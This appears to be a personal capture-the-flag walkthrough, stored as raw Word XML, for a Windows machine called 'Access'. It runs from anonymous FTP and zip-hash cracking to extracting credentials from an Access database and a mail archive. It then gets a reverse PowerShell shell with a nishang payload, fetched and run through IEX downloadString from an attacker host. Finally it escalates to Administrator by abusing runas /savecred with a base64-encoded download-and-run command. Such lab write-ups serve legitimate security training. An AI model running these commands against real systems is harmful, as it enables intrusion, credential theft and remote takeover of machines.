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2A149100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CD466A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access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2FCFCB03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103343">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In that lab, I obtain the perfect information of how to use the kali  in build tools with move shell to shell and smb to shell.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5C932A5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CD466A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV 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6930BE8D" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00B56C02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0FF8D292" w14:textId="5F5AE15A" w:rsidR="00B56C02" w:rsidRDefault="00B56C02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ftp ip = try with anonymous anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A38FF" w14:textId="07264012" w:rsidR="00BB1728" w:rsidRDefault="00BB1728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to download all ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508DD618" w14:textId="49A89514" w:rsidR="00BB1728" w:rsidRDefault="00BB1728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wget -m </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="000B2497" w:rsidRPr="002355D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ftp://anonymous:anonymous@ip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B2497">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we got passive mode fail </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF6A0D" w14:textId="49A813B9" w:rsidR="000B2497" w:rsidRDefault="000B2497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wget -m  </w:t>
      </w:r>
      <w:r w:rsidR="00A94A48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">no-passive </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00A94A48" w:rsidRPr="002355D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ftp://anonymous:anonymous@ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55124F96" w14:textId="20594A0C" w:rsidR="00B56C02" w:rsidRDefault="00BB01A0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for unzip the file we try with easy way but we failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295BBF9" w14:textId="2EB83152" w:rsidR="00BB01A0" w:rsidRDefault="00BB01A0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zip2john Access Control.zip &gt;Access Control.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408B278" w14:textId="171AB587" w:rsidR="00BB01A0" w:rsidRDefault="00EB6729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for backup.mbd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18638FCD" w14:textId="067006E7" w:rsidR="00871AB2" w:rsidRDefault="00EB6729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file backup.mdb = we notice that its running on the Microsoft access databas</w:t>
      </w:r>
      <w:r w:rsidR="00871AB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875A20A" w14:textId="3636A96F" w:rsidR="00BB01A0" w:rsidRDefault="00B80A4B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compare both to extract the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F5A710" w14:textId="56F29066" w:rsidR="00B80A4B" w:rsidRDefault="00B80A4B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strings backup.mdb &gt; ppp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119973EE" w14:textId="14CCFC03" w:rsidR="00B8490F" w:rsidRDefault="00B80A4B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john Access Control.hash –wordlist=ppp</w:t>
      </w:r>
      <w:r w:rsidR="00B8490F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159607CB" w14:textId="2516D3E2" w:rsidR="00B8490F" w:rsidRDefault="00B8490F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access4u@security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE479F" w14:textId="1BD591BB" w:rsidR="00414767" w:rsidRDefault="00414767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apt install mbdtools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D399E20" w14:textId="105EE118" w:rsidR="00EB061D" w:rsidRDefault="00414767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mdb-sql backup.mbd</w:t>
      </w:r>
      <w:r w:rsidR="00EB061D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = list tables = go </w:t>
      </w:r>
      <w:r w:rsidR="00475843">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[or else we can run mdb-tables. same output]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC68CC4" w14:textId="7DBD24B3" w:rsidR="00EB061D" w:rsidRDefault="00EB061D" w:rsidP="00B56C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see the list of tables</w:t>
      </w:r>
      <w:r w:rsidR="00277BBB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1ED49F5" w14:textId="77777777" w:rsidR="00B56C02" w:rsidRDefault="00B56C02" w:rsidP="00B56C02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4137ABD7" w14:textId="77777777" w:rsidR="00B56C02" w:rsidRDefault="00B56C02" w:rsidP="00B56C02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193EF81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for I in $(mdb-tables backup.mdb); do echo $i; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357E319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I in $(mdb-tables backup.mdb); do mdb-export backup.mdb $i &gt; tables/$i; done = tables with the intern details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAFECE4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wc -l * = line count for every files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611FDA5E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ignore the 1 line files notice big file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E092596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auth-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3B25F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auth-user = we obtain some id and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EE046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try to unzip the Access Control.pst file. But we failed so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE9747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readpst Access Control.pst = we notice the .mdox is create </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE3AF7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less Access Control.mdox = we notice the password change for security. 4Cc3ssC0ntr0ller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="1F4D7570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1F85133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use telnet ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FD1F7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security as username and password which we just obtain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736D2A9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obtain user.txt = now to obtain the shell of this we do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0F2584D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create www into it cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang,ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C32282F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last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C8557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Invoke-PowerShellTcp -Reverse -IPAddress our_ip -Port 9001 = save it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD44022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python3 -m http.server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD36E9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nc -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08206B54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5EC23175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powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.56:8000/nishang.ps1’)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF03B55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shell of this same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20FFF3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terminal cd /opt/JAWS/ = git pull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0607DF7A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cp /opt/JAWS/jaws-enum.ps1 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771508C2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mv jaws-enum.ps1 www = where python server is started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDF894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36363A94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IEX(New-Object Net.webclient).downloadString(‘http://10.10.14.56:8000/jaws-enum.ps1’) = we obtain majority of the imformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972207F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the end we notice the currently stored credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A559516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Users = cd Public\Desktop = we see xxxxxxxsystem.lnk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10452484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Get-Content “xxxxxxxxxxsystem.lnk” = .lnk is sort for sortcut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4796A648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extract the link we can go with powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975F92F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$WScript = New-Object -ComObject Wcsript.Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE588E5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$shortcut = Get-ChildItem *.lnk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C186BE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$Wscript.CreateShortcut($shortcut) = we obtain all the info of that file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B00CB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</w:p>
    <w:p w14:paraId="3E3A1016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cp nishang.ps1  9002.ps1 = vi it and change the port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487F981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shell just run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BA619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runas /user:ACCESS\Administrator /savecred “powershell \”IEX(New-Objecct Net.WebClient).downloadString(‘jttp://10.10.14.56:8000/9002.ps1’)\””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459FFDED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heats the httpserver but not connect with port so try with base 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD35DB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echo -n ”IEX(New-Objecct Net.WebClient).downloadString(‘jttp://10.10.14.56:8000/9002.ps1’)” | iconv - -to-code UTF-16L E | base64 -w 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267D459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Window does everything into that format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A203D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runas /user:ACCESS\Administrator /savecred “powershell -EncodedCommand paste” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3B00F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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0045F882" w14:textId="77777777" w:rsidR="00103343" w:rsidRDefault="00103343" w:rsidP="00103343">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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4214A56" w14:textId="0138268C" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00103343" w:rsidP="0010334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desktop we obtain the root.txt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B2497"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000E51D8"/>
    <w:rsid w:val="00103343"/>
    <w:rsid w:val="0010641D"/>
    <w:rsid w:val="001B11C0"/>
    <w:rsid w:val="001B5950"/>
    <w:rsid w:val="001E4052"/>
    <w:rsid w:val="002759AC"/>
    <w:rsid w:val="00277BBB"/>
    <w:rsid w:val="00355713"/>
    <w:rsid w:val="003F300B"/>
    <w:rsid w:val="004008D2"/>
    <w:rsid w:val="00414767"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00475843"/>
    <w:rsid w:val="0048316A"/>
    <w:rsid w:val="004A0225"/>
    <w:rsid w:val="004C63B4"/>
    <w:rsid w:val="00535F7A"/>
    <w:rsid w:val="005D707F"/>
    <w:rsid w:val="006078FC"/>
    <w:rsid w:val="006208AC"/>
    <w:rsid w:val="006456A6"/>
    <w:rsid w:val="006D6988"/>
    <w:rsid w:val="0072213E"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00871AB2"/>
    <w:rsid w:val="008B40DA"/>
    <w:rsid w:val="008E3157"/>
    <w:rsid w:val="009125C0"/>
    <w:rsid w:val="0094526B"/>
    <w:rsid w:val="00952AAA"/>
    <w:rsid w:val="00963531"/>
    <w:rsid w:val="00975C96"/>
    <w:rsid w:val="0099096A"/>
    <w:rsid w:val="009942FA"/>
    <w:rsid w:val="009A0EF6"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A63D73"/>
    <w:rsid w:val="00A84BCF"/>
    <w:rsid w:val="00A90225"/>
    <w:rsid w:val="00A910E5"/>
    <w:rsid w:val="00A94A48"/>
    <w:rsid w:val="00AA7687"/>
    <w:rsid w:val="00AC7503"/>
    <w:rsid w:val="00AD2609"/>
    <w:rsid w:val="00B13E0F"/>
    <w:rsid w:val="00B56C02"/>
    <w:rsid w:val="00B80A4B"/>
    <w:rsid w:val="00B8490F"/>
    <w:rsid w:val="00B972B9"/>
    <w:rsid w:val="00BB01A0"/>
    <w:rsid w:val="00BB1728"/>
    <w:rsid w:val="00BB6EE6"/>
    <w:rsid w:val="00C026C5"/>
    <w:rsid w:val="00C10215"/>
    <w:rsid w:val="00C30E1E"/>
    <w:rsid w:val="00CB0644"/>
    <w:rsid w:val="00CD466A"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D123E7"/>
    <w:rsid w:val="00D90E75"/>
    <w:rsid w:val="00E30954"/>
    <w:rsid w:val="00E91E75"/>
    <w:rsid w:val="00EB061D"/>
    <w:rsid w:val="00EB6729"/>
    <w:rsid w:val="00F061B1"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FD3AEE"/>
    <w:rsid w:val="00FF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6A6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tp://anonymous:anonymous@ip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="ftp://anonymous:anonymous@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63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>